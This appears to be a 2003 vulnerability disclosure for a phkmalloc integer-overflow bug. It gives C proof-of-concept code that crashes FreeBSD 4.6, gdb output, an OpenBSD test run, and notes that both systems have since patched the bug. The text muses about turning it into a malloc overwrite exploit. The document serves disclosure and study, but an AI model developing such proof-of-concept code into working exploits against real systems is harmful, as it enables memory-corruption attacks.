---[ Description

malloc() (which actually phkmalloc) can be passed a large argument, such
that the new break address overflows and the segment size is actually
reduced,  causing the application to crash anywhere.

It would be interesting whether this could be used to force an address-shrink
to addresses where the memory info is stored since it's not stored in-band as
in libc which allows for easy malloc overwrite exploits.

---[ Test Code
        
/*      proof of concept for phkmalloc bugs */
#include <sys/types.h>
        
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
        
u_long NFOO     = (80*1024*1024);
u_long NBAR     = (-80*1024*1024);
u_long NSIZE    = (8*1024*1024);

int
main(void)
{       
        char *foo, *bar, *shell;
        int i;
        
        foo = malloc(sizeof *foo * NFOO);
        if (!foo) {
                fprintf(stderr, "Allocating foo failed\n");
                exit(-1);
        }
        
        bar = malloc(sizeof *bar * NBAR);
        if (!bar) {
                fprintf(stderr, "malloc() fails\n");
        }
        
        shell = getenv("SHELL");
        fprintf(stdout, "SHELL: %s\n", shell);

        for (i =0 ; i < NSIZE; ++i) {
                strlcpy(foo + i, "0123456789", 11);
        }
        
        shell = getenv("SHELL");
        fprintf(stdout, "SHELL: %s\n", shell);
        
        exit(0);
}               
                
        
** FreeBSD/x86
        
FreeBSD monyet 4.6-STABLE FreeBSD 4.6-STABLE #0: Fri Aug 9 08:59:35 WIT 2002
jim@monyet:/usr/src/sys/compile/MONYET i386
        
[19:12:02] monyet:~/works/phkmalloc > make CFLAGS="-Wall -g" test
cc -Wall -g  test.c  -o test

[19:12:42] monyet:~/works/phkmalloc > ./test
Segmentation fault (core dumped)

[19:13:13] monyet:~/works/phkmalloc > gdb ./test ./test.core
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
Core was generated by `test'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /usr/lib/libc.so.4...done.
Reading symbols from /usr/libexec/ld-elf.so.1...done.
#0  0x280e0429 in isatty () from /usr/lib/libc.so.4
(gdb) bt
#0  0x280e0429 in isatty () from /usr/lib/libc.so.4
#1  0x280e074d in isatty () from /usr/lib/libc.so.4
#2  0x280e0e65 in malloc () from /usr/lib/libc.so.4
#3  0x80485e6 in main () at test.c:25
#4  0x80484f9 in _start ()
(gdb)

** OpenBSD/x86

OpenBSD 3.2-current (KUTUKUPRET) #1: Fri Jan 24 15:14:06 WIT 2003
    jim@orangutan:/hack/OpenBSD/src/sys/arch/i386/compile/KUTUKUPRET


[7:00:11pm] /hack/labs/fun/malloc > make CFLAGS+="-Wall -g" test
cc -Wall -g   -o test test.c 

[7:00:12pm] /hack/labs/fun/malloc > ./test 
malloc() fails
SHELL: /usr/local/bin/tcsh
SHELL: /usr/local/bin/tcsh

---[ Notes

o  OpenBSD already has sanity check for this which was commited on 2003/01/14.
   See http://www.openbsd.org/cgi-bin/cvsweb.cgi/src/lib/libc/stdlib/malloc.c.diff?r1=1.53&r2=1.54

o  Poul-Henning Kamp has commited the similar patch for FreeBSD on 2003/01/30.
   See http://www.freebsd.org/cgi/cvsweb.cgi/src/lib/libc/stdlib/malloc.c.diff?r1=1.73&r2=1.74